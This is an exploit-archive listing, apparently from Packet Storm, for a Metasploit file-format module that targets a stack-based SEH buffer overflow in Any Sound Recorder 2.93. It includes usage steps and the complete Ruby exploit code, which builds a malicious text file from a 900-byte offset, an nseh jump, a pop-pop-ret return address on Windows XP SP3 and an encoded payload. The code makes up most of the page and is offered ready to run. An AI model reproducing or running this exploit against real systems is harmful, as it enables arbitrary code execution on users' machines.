Any Sound Recorder 2.93 Buffer Overflow

Any Sound Recorder 2.93 Buffer Overflow: Posted Oct 31, 2018; Authored by Abdullah Alic, d3ckx1 | Site metasploit.com; This Metasploit module exploits a stack based buffer overflow in Any Sound Recorder version 2.93, when with the name "hack.txt". Copy the content of the "hack.txt", start Any Sound Recorder version 2.93, click "Enter Key Code", paste the content into field "User Name" click "Register".; tags | exploit, overflow; SHA-256 | 062b4c130006b7a1a41275e34f102fbcfff4af46144ccc18322350964fea97f7; Download | Favorite | View

Any Sound Recorder 2.93 Buffer Overflow

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Seh
 
  def initialize(info = {})
    super(update_info(info,
      'Name'    => 'Any Sound Recorder 2.93 Buffer Overflow (SEH)',
      'Description'  => %q{
          This module exploits a stack based buffer overflow in Any Sound Recorder 2.93, when
          with the name "hack.txt". Copy the content of the  "hack.txt",Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register"
      },
      'License'    => MSF_LICENSE,
      'Author'    =>
        [
          'Abdullah AlA+-ASS',            # Original discovery
          'd3ckx1 d3ck(at)qq.com',       # MSF module
        ],
      'References'  =>
        [
          [ 'OSVDB', '' ],
          [ 'EBD', '45627' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Platform'  => 'win',
      'Payload'   =>
        {
          'BadChars'    => "\x00\x0a\x0d",
          'DisableNops' => true,
          'Space'       => 10000
        },
      'Targets'   =>
        [
          [ 'Any Sound Recorder 2.93',
            {
              'Ret'     =>  0x72d12f35, # 0x72d12f35 : P/P/R FROM msacm32.drv form winxp sp3
              'Offset'  =>  900
            }
          ],
        ],
      'Privileged'  => false,
      'DisclosureDate'  => 'Oct 25 2018',
      'DefaultTarget'  => 0))
 
    register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt']),], self.class)
 
  end
 
  def exploit
    buf = "\x90"*(target['Offset'])
    buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload)
    buf << [target.ret] .pack('V')  # seh
    buf << make_nops(10)
    buf << payload.encoded
    buf << "\x90" * 200
 
    file_create(buf)
    handler
     
  end
end

Top Authors In Last 30 Days

Red Hat 269 files
Ubuntu 55 files
Gentoo 32 files
Debian 28 files
Apple 9 files
malvuln 6 files
nu11secur1ty 4 files
Adam Gowdiak 4 files
Ahmet Umit Bayram 3 files
liquidsky 3 files

File Archives

Systems

AIX (429)
Apple (2,087)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,042)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,499)
HPUX (880)
iOS (375)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,619)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,770)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,499)
UNIX (9,401)
UnixWare (187)
Windows (6,659)
Other

Any Sound Recorder 2.93 Buffer Overflow

Any Sound Recorder 2.93 Buffer Overflow

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Any Sound Recorder 2.93 Buffer Overflow

Share This

Any Sound Recorder 2.93 Buffer Overflow

File Archive:

May 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems